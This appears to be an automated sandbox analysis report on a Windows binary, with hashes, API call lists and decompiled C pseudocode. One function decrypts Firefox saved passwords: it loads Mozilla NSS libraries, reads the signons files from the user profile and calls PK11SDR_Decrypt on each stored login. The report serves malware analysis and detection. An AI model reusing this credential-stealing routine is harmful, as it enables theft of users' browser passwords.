                                    • String ID:
                                    • API String ID: 1964310414-0
                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction ID: b1e9c139d53b74868f197cdea1108a814add3867d20bcc7908f8201953e61f5a
                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                    • Instruction Fuzzy Hash: 0FC0127315024CABC700EEBDCC05D9B33DC5718609B008425B518C7100D139E6508B64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00730000,00000000), ref: 0040116D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction ID: de04998b76c7b9bc537c8d7dd9716f6d6fbeb3d3f43a7f0598963b3529812e59
                                    • Opcode Fuzzy Hash: 92043600f179df8161fd90e7cc6715d268c81291364fb812c52fc1a0b5335f47
                                    • Instruction Fuzzy Hash: 08B092B2500100AAD740D799DD42F4222ACA30C348F840C647248F31A1D13CA420472C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00401122(long __eax) {
                                    				long _t2;
                                    				void* _t3;
                                    				void* _t4;
                                    
                                    				_t2 =  *0x40d03c; // 0x0
                                    				_t3 =  *0x40e590; // 0x730000
                                    				_t4 = RtlAllocateHeap(_t3, _t2, __eax); // executed
                                    				return _t4;
                                    			}

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00730000,00000000), ref: 00401131
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction ID: c8d19fe016ae2e0651702f7a29d851e7a2fc058706c9609f530dee1e772ded5c
                                    • Opcode Fuzzy Hash: 38f1c27535b0e948f5a5ad8ec0e8e926c9901c3518291cec7c5888f3411caa45
                                    • Instruction Fuzzy Hash: 65B092A5A00000AFE640E7ED9E40E2223ECA70C2083800C247208E3162E13898104728
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • HeapFree.KERNEL32(00730000,00000000), ref: 0040114B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction ID: 0196c5bfe9261146ad4c3cc9aab034bd4c3b0778a6c2e215fe72248fa00cbfe1
                                    • Opcode Fuzzy Hash: 8a124644f8f097871d45822bdc4a07bce697b48a0407d33212c7d5ecf4e4f020
                                    • Instruction Fuzzy Hash: 47C08CB3220101ABDB0087E9DDC2D6622ECB208208B140C21F908EB061E13EC8A40228
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 59%
                                    			E00409EF8(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				struct HINSTANCE__* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr* _v16;
                                    				intOrPtr* _v20;
                                    				_Unknown_base(*)()* _v24;
                                    				_Unknown_base(*)()* _v28;
                                    				struct HINSTANCE__* _v32;
                                    				_Unknown_base(*)()* _v36;
                                    				void* _v40;
                                    				void* _v44;
                                    				long _v48;
                                    				void* _v52;
                                    				char _v56;
                                    				long _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				intOrPtr _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				struct HINSTANCE__** _v96;
                                    				char _v357;
                                    				char _v369;
                                    				intOrPtr _v373;
                                    				intOrPtr _v377;
                                    				char _v381;
                                    				struct HINSTANCE__* _v388;
                                    				struct HINSTANCE__* _v392;
                                    				struct HINSTANCE__* _v396;
                                    				struct HINSTANCE__* _v400;
                                    				struct HINSTANCE__* _v404;
                                    				struct HINSTANCE__* _v408;
                                    				char _v412;
                                    				char _v416;
                                    				intOrPtr _v420;
                                    				intOrPtr _v424;
                                    				intOrPtr _v428;
                                    				intOrPtr _v432;
                                    				intOrPtr _v436;
                                    				intOrPtr _v440;
                                    				intOrPtr _v444;
                                    				intOrPtr _v448;
                                    				intOrPtr _v452;
                                    				char _v456;
                                    				char _v460;
                                    				intOrPtr _v464;
                                    				char _v468;
                                    				char _v472;
                                    				intOrPtr _v476;
                                    				char _v480;
                                    				char _v484;
                                    				char _v488;
                                    				intOrPtr _v492;
                                    				char _v496;
                                    				char _v500;
                                    				intOrPtr _v504;
                                    				char _v508;
                                    				char _v512;
                                    				char _v516;
                                    				intOrPtr _v520;
                                    				char _v524;
                                    				char _v528;
                                    				intOrPtr _v532;
                                    				char _v536;
                                    				char _v540;
                                    				char _v544;
                                    				intOrPtr _v548;
                                    				char _v552;
                                    				char _v556;
                                    				intOrPtr _v560;
                                    				char _v564;
                                    				char _v568;
                                    				intOrPtr _v572;
                                    				char _v576;
                                    				char _v580;
                                    				char _v584;
                                    				char _v588;
                                    				char _v592;
                                    				CHAR* _t405;
                                    				intOrPtr _t433;
                                    				intOrPtr _t466;
                                    				intOrPtr _t470;
                                    				intOrPtr _t491;
                                    				intOrPtr _t518;
                                    				intOrPtr _t524;
                                    				intOrPtr _t526;
                                    				intOrPtr* _t625;
                                    				void* _t626;
                                    				intOrPtr _t701;
                                    				intOrPtr _t719;
                                    				intOrPtr _t744;
                                    				intOrPtr _t745;
                                    				intOrPtr _t746;
                                    				intOrPtr _t747;
                                    				intOrPtr _t748;
                                    				intOrPtr _t749;
                                    				intOrPtr _t750;
                                    				intOrPtr* _t753;
                                    				intOrPtr* _t754;
                                    				intOrPtr* _t755;
                                    				intOrPtr* _t756;
                                    				_Unknown_base(*)()* _t759;
                                    				intOrPtr* _t760;
                                    				intOrPtr _t762;
                                    				intOrPtr _t763;
                                    
                                    				_t762 = _t763;
                                    				_t626 = 0x49;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t626 = _t626 - 1;
                                    				} while (_t626 != 0);
                                    				_push(_t626);
                                    				_push(__ebx);
                                    				_t625 = __eax;
                                    				_push(_t762);
                                    				_push(0x40aba5);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t763;
                                    				_t766 =  *0x40f1d4;
                                    				if( *0x40f1d4 == 0) {
                                    					E004061DC( &_v416, __eax, 0x40f1d4, _t766);
                                    					E00401B14(0x40f1d4, _v416);
                                    				}
                                    				E00401B14(_t625, 0x40abbc);
                                    				E00401AC0( &_v84);
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("mozcrt19.dll");
                                    				E00401E10();
                                    				_v412 = LoadLibraryA(E00401F48(_v420));
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("sqlite3.dll");
                                    				E00401E10();
                                    				_v408 = LoadLibraryA(E00401F48(_v424));
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("nspr4.dll");
                                    				E00401E10();
                                    				_v404 = LoadLibraryA(E00401F48(_v428));
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("plc4.dll");
                                    				E00401E10();
                                    				_v400 = LoadLibraryA(E00401F48(_v432));
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("plds4.dll");
                                    				E00401E10();
                                    				_v396 = LoadLibraryA(E00401F48(_v436));
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("nssutil3.dll");
                                    				E00401E10();
                                    				_v392 = LoadLibraryA(E00401F48(_v440));
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("softokn3.dll");
                                    				E00401E10();
                                    				_v388 = LoadLibraryA(E00401F48(_v444));
                                    				_push( *0x40f1d4);
                                    				_push("\\Mozilla Firefox\\");
                                    				_push("nss3.dll");
                                    				E00401E10();
                                    				_v8 = LoadLibraryA(E00401F48(_v448));
                                    				_t759 = GetProcAddress(_v8, "NSS_Init");
                                    				_v12 = _t759;
                                    				if(_t759 != 0) {
                                    					_t753 = GetProcAddress(_v8, "NSSBase64_DecodeBuffer");
                                    					_t760 = _t753;
                                    					__eflags = _t753;
                                    					if(_t753 != 0) {
                                    						_t754 = GetProcAddress(_v8, "PK11_GetInternalKeySlot");
                                    						_v16 = _t754;
                                    						__eflags = _t754;
                                    						if(_t754 != 0) {
                                    							_t755 = GetProcAddress(_v8, "PK11_Authenticate");
                                    							_v20 = _t755;
                                    							__eflags = _t755;
                                    							if(_t755 != 0) {
                                    								_t756 = GetProcAddress(_v8, "PK11SDR_Decrypt");
                                    								__eflags = _t756;
                                    								if(_t756 != 0) {
                                    									_v24 = GetProcAddress(_v8, "NSS_Shutdown");
                                    									__eflags = _v24;
                                    									if(_v24 != 0) {
                                    										_v28 = GetProcAddress(_v8, "PK11_FreeSlot");
                                    										__eflags = _v28;
                                    										if(__eflags != 0) {
                                    											_v32 = LoadLibraryA("userenv.dll");
                                    											_v36 = GetProcAddress(_v32, "GetUserProfileDirectoryA");
                                    											OpenProcessToken(GetCurrentProcess(), 8,  &_v40);
                                    											E00405BEC( &_v456, _t625, _t760, __eflags);
                                    											_push(_v456);
                                    											_push("\\Mozilla\\Firefox\\");
                                    											_push("profiles.ini");
                                    											E00401E10();
                                    											GetPrivateProfileStringA("Profile0", "Path", 0x40ad64,  &_v357, 0x104, E00401F48(_v452));
                                    											E00405BEC( &_v468, _t625, _t760, __eflags);
                                    											_push(_v468);
                                    											_push("\\Mozilla\\Firefox\\");
                                    											E00401D24( &_v472, 0x105,  &_v357);
                                    											_push(_v472);
                                    											_push("\\signons3.txt");
                                    											E00401E10();
                                    											E00401CAC( &_v460, E00401F48(_v464));
                                    											__eflags = E00405D04(_v460, _t625, __eflags) - 1;
                                    											if(__eflags != 0) {
                                    												E00405BEC( &_v496, _t625, _t760, __eflags);
                                    												_push(_v496);
                                    												_push("\\Mozilla\\Firefox\\");
                                    												E00401D24( &_v500, 0x105,  &_v357);
                                    												_push(_v500);
                                    												_push("\\signons2.txt");
                                    												E00401E10();
                                    												E00401CAC( &_v488, E00401F48(_v492));
                                    												__eflags = E00405D04(_v488, _t625, __eflags) - 1;
                                    												if(__eflags != 0) {
                                    													E00405BEC( &_v524, _t625, _t760, __eflags);
                                    													_push(_v524);
                                    													_push("\\Mozilla\\Firefox\\");
                                    													E00401D24( &_v528, 0x105,  &_v357);
                                    													_push(_v528);
                                    													_push("\\signons1.txt");
                                    													E00401E10();
                                    													E00401CAC( &_v516, E00401F48(_v520));
                                    													__eflags = E00405D04(_v516, _t625, __eflags) - 1;
                                    													if(__eflags != 0) {
                                    														E00405BEC( &_v552, _t625, _t760, __eflags);
                                    														_push(_v552);
                                    														_push("\\Mozilla\\Firefox\\");
                                    														E00401D24( &_v556, 0x105,  &_v357);
                                    														_push(_v556);
                                    														_push("\\signons.txt");
                                    														E00401E10();
                                    														E00401CAC( &_v544, E00401F48(_v548));
                                    														__eflags = E00405D04(_v544, _t625, __eflags) - 1;
                                    														if(__eflags != 0) {
                                    															E00401AC0(_t625);
                                    														} else {
                                    															E00405BEC( &_v564, _t625, _t760, __eflags);
                                    															_push(_v564);
                                    															_push("\\Mozilla\\Firefox\\");
                                    															E00401D24( &_v568, 0x105,  &_v357);
                                    															_push(_v568);
                                    															_push("\\signons.txt");
                                    															E00401E10();
                                    															_t405 = E00401F48(_v560);
                                    															goto L48;
                                    														}
                                    													} else {
                                    														E00405BEC( &_v536, _t625, _t760, __eflags);
                                    														_push(_v536);
                                    														_push("\\Mozilla\\Firefox\\");
                                    														E00401D24( &_v540, 0x105,  &_v357);
                                    														_push(_v540);
                                    														_push("\\signons1.txt");
                                    														E00401E10();
                                    														_t405 = E00401F48(_v532);
                                    														goto L48;
                                    													}
                                    												} else {
                                    													E00405BEC( &_v508, _t625, _t760, __eflags);
                                    													_push(_v508);
                                    													_push("\\Mozilla\\Firefox\\");
                                    													E00401D24( &_v512, 0x105,  &_v357);
                                    													_push(_v512);
                                    													_push("\\signons2.txt");
                                    													E00401E10();
                                    													_t405 = E00401F48(_v504);
                                    													goto L48;
                                    												}
                                    											} else {
                                    												E00405BEC( &_v480, _t625, _t760, __eflags);
                                    												_push(_v480);
                                    												_push("\\Mozilla\\Firefox\\");
                                    												E00401D24( &_v484, 0x105,  &_v357);
                                    												_push(_v484);
                                    												_push("\\signons3.txt");
                                    												E00401E10();
                                    												_t405 = E00401F48(_v476);
                                    												L48:
                                    												_v44 = CreateFileA(_t405, 0x80000000, 1, 0, 3, 0, 0);
                                    												_v48 = GetFileSize(_v44, 0);
                                    												_v52 = E00401174(_v48);
                                    												ReadFile(_v44, _v52, _v48,  &_v60, 0);
                                    												CloseHandle(_v44);
                                    												E00401CAC( &_v56, _v52);
                                    												E0040118C(_v52);
                                    												E00401FE4( &_v56, E0040202C(0x40ade4, _v56) + 2, 1);
                                    												E00405BEC( &_v576, _t625, _t760, __eflags);
                                    												E00401D24( &_v580, 0x105,  &_v357);
                                    												E00401E10();
                                    												_t433 = _v12(E00401F48(_v572), _v580, "\\Mozilla\\Firefox\\", _v576);
                                    												__eflags = _t433;
                                    												if(_t433 == 0) {
                                    													_v80 = _v16();
                                    													__eflags = _v80;
                                    													if(_v80 != 0) {
                                    														_t466 = _v20(_v80, 1, 0);
                                    														_t763 = _t763 + 0xc;
                                    														__eflags = _t466;
                                    														if(_t466 == 0) {
                                    															while(1) {
                                    																L60:
                                    																_t470 = E00401D50(_v56);
                                    																__eflags = _t470;
                                    																if(_t470 == 0) {
                                    																	goto L61;
                                    																}
                                    																E00401FA4(_v56, E0040202C(0x40ade4, _v56) - 1, 1,  &_v64);
                                    																E00401FE4( &_v56, E00401D50(_v64) + 3, 1);
                                    																E00401FA4(_v64, E0040202C(0x40adf0, _v64) - 1, 1,  &_v68);
                                    																E00401FE4( &_v64, E00401D50(_v68) + 2, 1);
                                    																_push(_v84);
                                    																_push("##$$");
                                    																_push(_v68);
                                    																_push(0x40ae0c);
                                    																E00401E10();
                                    																while(1) {
                                    																	_t491 = E00401D50(_v64);
                                    																	__eflags = _t491;
                                    																	if(_t491 == 0) {
                                    																		goto L60;
                                    																	}
                                    																	E00401FA4(_v64, E0040202C(0x40adf0, _v64) - 1, 1,  &_v72);
                                    																	E00401FE4( &_v64, E00401D50(_v72) + 2, 1);
                                    																	E00401FA4(_v64, E0040202C(0x40adf0, _v64) - 1, 1,  &_v76);
                                    																	E00401FE4( &_v64, E00401D50(_v76) + 2, 1);
                                    																	 *_t760(0,  &_v369, E00401F48(_v76), E00401D50(_v76));
                                    																	_t518 =  *_t756( &_v369,  &_v381, 0);
                                    																	_t763 = _t763 + 0x1c;
                                    																	__eflags = _t518;
                                    																	if(_t518 == 0) {
                                    																		E00401CAC(_t625, _v377);
                                    																		E00402074(_t625, _v373);
                                    																		_t524 = E00401D50(_v72);
                                    																		__eflags = _t524;
                                    																		if(_t524 == 0) {
                                    																			E00401B58( &_v72, "(unnamed value)");
                                    																		}
                                    																		_t526 = E00401D50(_v76);
                                    																		__eflags = _t526;
                                    																		if(_t526 == 0) {
                                    																			E00401B58( &_v76, "(unnamed password)");
                                    																		}
                                    																		_push(_v84);
                                    																		_push( *_t625);
                                    																		_push(0x40ae0c);
                                    																		E00401E10();
                                    																	}
                                    																}
                                    															}
                                    														}
                                    														L61:
                                    														_v28(_v80);
                                    													}
                                    													_v24();
                                    												}
                                    												E00401D9C(_t625, 0x40adfc, _v84);
                                    												E00401B58( &_v92, _v84);
                                    												E0040592C(0x40adfc, _t625, _v92, 0, _t760, __eflags,  &_v584);
                                    												E00401B58( &_v92, _v584);
                                    												E0040592C(0x40ae0c, _t625, _v92, 0, _t760, __eflags,  &_v588);
                                    												E00401B58( &_v92, _v588);
                                    												E0040592C(0x40ae4c, _t625, _v92, 0, _t760, __eflags,  &_v592);
                                    												E00401B58( &_v92, _v592);
                                    												__eflags = _v92;
                                    												if(_v92 == 0) {
                                    													E00401AC0(_t625);
                                    												}
                                    												_v88 = 7;
                                    												_v96 =  &_v412;
                                    												do {
                                    													_push(_t762);
                                    													_push(0x40ab4f);
                                    													_push( *[fs:eax]);
                                    													 *[fs:eax] = _t763;
                                    													FreeLibrary( *_v96);
                                    													FreeLibrary(_v8);
                                    													_pop(_t719);
                                    													 *[fs:eax] = _t719;
                                    													_v96 =  &(_v96[1]);
                                    													_t270 =  &_v88;
                                    													 *_t270 = _v88 - 1;
                                    													__eflags =  *_t270;
                                    												} while ( *_t270 != 0);
                                    											}
                                    										} else {
                                    											E00401AC0(_t625);
                                    											_v88 = 7;
                                    											_v96 =  &_v412;
                                    											do {
                                    												_push(_t762);
                                    												_push(0x40a3e8);
                                    												_push( *[fs:eax]);
                                    												 *[fs:eax] = _t763;
                                    												FreeLibrary( *_v96);
                                    												FreeLibrary(_v8);
                                    												_pop(_t744);
                                    												 *[fs:eax] = _t744;
                                    												_v96 =  &(_v96[1]);
                                    												_t103 =  &_v88;
                                    												 *_t103 = _v88 - 1;
                                    												__eflags =  *_t103;
                                    											} while ( *_t103 != 0);
                                    										}
                                    									} else {
                                    										E00401AC0(_t625);
                                    										_v88 = 7;
                                    										_v96 =  &_v412;
                                    										do {
                                    											_push(_t762);
                                    											_push(0x40a376);
                                    											_push( *[fs:eax]);
                                    											 *[fs:eax] = _t763;
                                    											FreeLibrary( *_v96);
                                    											FreeLibrary(_v8);
                                    											_pop(_t745);
                                    											 *[fs:eax] = _t745;
                                    											_v96 =  &(_v96[1]);
                                    											_t91 =  &_v88;
                                    											 *_t91 = _v88 - 1;
                                    											__eflags =  *_t91;
                                    										} while ( *_t91 != 0);
                                    									}
                                    								} else {
                                    									E00401AC0(_t625);
                                    									_v88 = 7;
                                    									_v96 =  &_v412;
                                    									do {
                                    										_push(_t762);
                                    										_push(0x40a304);
                                    										_push( *[fs:eax]);
                                    										 *[fs:eax] = _t763;
                                    										FreeLibrary( *_v96);
                                    										FreeLibrary(_v8);
                                    										_pop(_t746);
                                    										 *[fs:eax] = _t746;
                                    										_v96 =  &(_v96[1]);
                                    										_t79 =  &_v88;
                                    										 *_t79 = _v88 - 1;
                                    										__eflags =  *_t79;
                                    									} while ( *_t79 != 0);
                                    								}
                                    							} else {
                                    								E00401AC0(_t625);
                                    								_v88 = 7;
                                    								_v96 =  &_v412;
                                    								do {
                                    									_push(_t762);
                                    									_push(0x40a295);
                                    									_push( *[fs:eax]);
                                    									 *[fs:eax] = _t763;
                                    									FreeLibrary( *_v96);
                                    									FreeLibrary(_v8);
                                    									_pop(_t747);
                                    									 *[fs:eax] = _t747;
                                    									_v96 =  &(_v96[1]);
                                    									_t69 =  &_v88;
                                    									 *_t69 = _v88 - 1;
                                    									__eflags =  *_t69;
                                    								} while ( *_t69 != 0);
                                    							}
                                    						} else {
                                    							E00401AC0(_t625);
                                    							_v88 = 7;
                                    							_v96 =  &_v412;
                                    							do {
                                    								_push(_t762);
                                    								_push(0x40a223);
                                    								_push( *[fs:eax]);
                                    								 *[fs:eax] = _t763;
                                    								FreeLibrary( *_v96);
                                    								FreeLibrary(_v8);
                                    								_pop(_t748);
                                    								 *[fs:eax] = _t748;
                                    								_v96 =  &(_v96[1]);
                                    								_t58 =  &_v88;
                                    								 *_t58 = _v88 - 1;
                                    								__eflags =  *_t58;
                                    							} while ( *_t58 != 0);
                                    						}
                                    					} else {
                                    						E00401AC0(_t625);
                                    						_v88 = 7;
                                    						_v96 =  &_v412;
                                    						do {
                                    							_push(_t762);
                                    							_push(0x40a1b1);
                                    							_push( *[fs:eax]);
                                    							 *[fs:eax] = _t763;
                                    							FreeLibrary( *_v96);
                                    							FreeLibrary(_v8);
                                    							_pop(_t749);
                                    							 *[fs:eax] = _t749;
                                    							_v96 =  &(_v96[1]);
                                    							_t47 =  &_v88;
                                    							 *_t47 = _v88 - 1;
                                    							__eflags =  *_t47;
                                    						} while ( *_t47 != 0);
                                    					}
                                    				} else {
                                    					E00401AC0(_t625);
                                    					_v88 = 7;
                                    					_v96 =  &_v412;
                                    					do {
                                    						_push(_t762);
                                    						_push(0x40a140);
                                    						_push( *[fs:eax]);
                                    						 *[fs:eax] = _t763;
                                    						FreeLibrary( *_v96);
                                    						FreeLibrary(_v8);
                                    						_pop(_t750);
                                    						 *[fs:eax] = _t750;
                                    						_v96 =  &(_v96[1]);
                                    						_t37 =  &_v88;
                                    						 *_t37 = _v88 - 1;
                                    					} while ( *_t37 != 0);
                                    				}
                                    				_pop(_t701);
                                    				 *[fs:eax] = _t701;
                                    				_push(E0040ABAC);
                                    				E00401AE4( &_v592, 0x2d);
                                    				E00401AC0( &_v92);
                                    				E00401AC0( &_v84);
                                    				E00401AE4( &_v76, 4);
                                    				return E00401AC0( &_v56);
                                    			}
                                    0x00000000
                                    0x00000000
                                    0x0040a8c7
                                    0x0040a8e1
                                    0x0040a902
                                    0x0040a91c
                                    0x0040a921
                                    0x0040a924
                                    0x0040a929
                                    0x0040a92c
                                    0x0040a939
                                    0x0040aa55
                                    0x0040aa58
                                    0x0040aa5d
                                    0x0040aa5f
                                    0x00000000
                                    0x00000000
                                    0x0040a95f
                                    0x0040a979
                                    0x0040a99a
                                    0x0040a9b4
                                    0x0040a9d4
                                    0x0040a9e9
                                    0x0040a9eb
                                    0x0040a9ee
                                    0x0040a9f0
                                    0x0040a9fa
                                    0x0040aa07
                                    0x0040aa0f
                                    0x0040aa14
                                    0x0040aa16
                                    0x0040aa20
                                    0x0040aa20
                                    0x0040aa28
                                    0x0040aa2d
                                    0x0040aa2f
                                    0x0040aa39
                                    0x0040aa39
                                    0x0040aa3e
                                    0x0040aa41
                                    0x0040aa43
                                    0x0040aa50
                                    0x0040aa50
                                    0x0040a9f0
                                    0x0040aa55
                                    0x0040aa65
                                    0x0040aa75
                                    0x0040aa79
                                    0x0040aa7c
                                    0x0040aa7d
                                    0x0040aa7d
                                    0x0040aa8a
                                    0x0040aa95
                                    0x0040aaab
                                    0x0040aab9
                                    0x0040aacf
                                    0x0040aadd
                                    0x0040aaf3
                                    0x0040ab01
                                    0x0040ab06
                                    0x0040ab0a
                                    0x0040ab0e
                                    0x0040ab0e
                                    0x0040ab13
                                    0x0040ab20
                                    0x0040ab23
                                    0x0040ab25
                                    0x0040ab26
                                    0x0040ab2b
                                    0x0040ab2e
                                    0x0040ab37
                                    0x0040ab40
                                    0x0040ab47
                                    0x0040ab4a
                                    0x0040ab59
                                    0x0040ab5d
                                    0x0040ab5d
                                    0x0040ab5d
                                    0x0040ab5d
                                    0x0040ab23
                                    0x0040a3a5
                                    0x0040a3a7
                                    0x0040a3ac
                                    0x0040a3b9
                                    0x0040a3bc
                                    0x0040a3be
                                    0x0040a3bf
                                    0x0040a3c4
                                    0x0040a3c7
                                    0x0040a3d0
                                    0x0040a3d9
                                    0x0040a3e0
                                    0x0040a3e3
                                    0x0040a3f2
                                    0x0040a3f6
                                    0x0040a3f6
                                    0x0040a3f6
                                    0x0040a3f6
                                    0x0040a3fb
                                    0x0040a333
                                    0x0040a335
                                    0x0040a33a
                                    0x0040a347
                                    0x0040a34a
                                    0x0040a34c
                                    0x0040a34d
                                    0x0040a352
                                    0x0040a355
                                    0x0040a35e
                                    0x0040a367
                                    0x0040a36e
                                    0x0040a371
                                    0x0040a380
                                    0x0040a384
                                    0x0040a384
                                    0x0040a384
                                    0x0040a384
                                    0x0040a389
                                    0x0040a2c1
                                    0x0040a2c3
                                    0x0040a2c8
                                    0x0040a2d5
                                    0x0040a2d8
                                    0x0040a2da
                                    0x0040a2db
                                    0x0040a2e0
                                    0x0040a2e3
                                    0x0040a2ec
                                    0x0040a2f5
                                    0x0040a2fc
                                    0x0040a2ff
                                    0x0040a30e
                                    0x0040a312
                                    0x0040a312
                                    0x0040a312
                                    0x0040a312
                                    0x0040a317
                                    0x0040a252
                                    0x0040a254
                                    0x0040a259
                                    0x0040a266
                                    0x0040a269
                                    0x0040a26b
                                    0x0040a26c
                                    0x0040a271
                                    0x0040a274
                                    0x0040a27d
                                    0x0040a286
                                    0x0040a28d
                                    0x0040a290
                                    0x0040a29f
                                    0x0040a2a3
                                    0x0040a2a3
                                    0x0040a2a3
                                    0x0040a2a3
                                    0x0040a2a8
                                    0x0040a1e0
                                    0x0040a1e2
                                    0x0040a1e7
                                    0x0040a1f4
                                    0x0040a1f7
                                    0x0040a1f9
                                    0x0040a1fa
                                    0x0040a1ff
                                    0x0040a202
                                    0x0040a20b
                                    0x0040a214
                                    0x0040a21b
                                    0x0040a21e
                                    0x0040a22d
                                    0x0040a231
                                    0x0040a231
                                    0x0040a231
                                    0x0040a231
                                    0x0040a236
                                    0x0040a16e
                                    0x0040a170
                                    0x0040a175
                                    0x0040a182
                                    0x0040a185
                                    0x0040a187
                                    0x0040a188
                                    0x0040a18d
                                    0x0040a190
                                    0x0040a199
                                    0x0040a1a2
                                    0x0040a1a9
                                    0x0040a1ac
                                    0x0040a1bb
                                    0x0040a1bf
                                    0x0040a1bf
                                    0x0040a1bf
                                    0x0040a1bf
                                    0x0040a1c4
                                    0x0040a0fd
                                    0x0040a0ff
                                    0x0040a104
                                    0x0040a111
                                    0x0040a114
                                    0x0040a116
                                    0x0040a117
                                    0x0040a11c
                                    0x0040a11f
                                    0x0040a128
                                    0x0040a131
                                    0x0040a138
                                    0x0040a13b
                                    0x0040a14a
                                    0x0040a14e
                                    0x0040a14e
                                    0x0040a14e
                                    0x0040a153
                                    0x0040ab64
                                    0x0040ab67
                                    0x0040ab6a
                                    0x0040ab7a
                                    0x0040ab82
                                    0x0040ab8a
                                    0x0040ab97
                                    0x0040aba4

                                    APIs
                                    • LoadLibraryA.KERNEL32(00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4,00000000,0040ABA5,?,?,?,?,00000048,00000000,00000000), ref: 00409F79
                                    • LoadLibraryA.KERNEL32(00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4,00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4,00000000,0040ABA5,?,?,?,?,00000048,00000000), ref: 00409FAC
                                    • LoadLibraryA.KERNEL32(00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4,00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4,00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4,00000000,0040ABA5), ref: 00409FDF
                                    • LoadLibraryA.KERNEL32(00000000,plc4.dll,\Mozilla Firefox\,0040F1D4,00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4,00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4,00000000,mozcrt19.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A012
                                    • LoadLibraryA.KERNEL32(00000000,plds4.dll,\Mozilla Firefox\,0040F1D4,00000000,plc4.dll,\Mozilla Firefox\,0040F1D4,00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4,00000000,sqlite3.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A045
                                    • LoadLibraryA.KERNEL32(00000000,nssutil3.dll,\Mozilla Firefox\,0040F1D4,00000000,plds4.dll,\Mozilla Firefox\,0040F1D4,00000000,plc4.dll,\Mozilla Firefox\,0040F1D4,00000000,nspr4.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A078
                                    • LoadLibraryA.KERNEL32(00000000,softokn3.dll,\Mozilla Firefox\,0040F1D4,00000000,nssutil3.dll,\Mozilla Firefox\,0040F1D4,00000000,plds4.dll,\Mozilla Firefox\,0040F1D4,00000000,plc4.dll,\Mozilla Firefox\,0040F1D4), ref: 0040A0AB
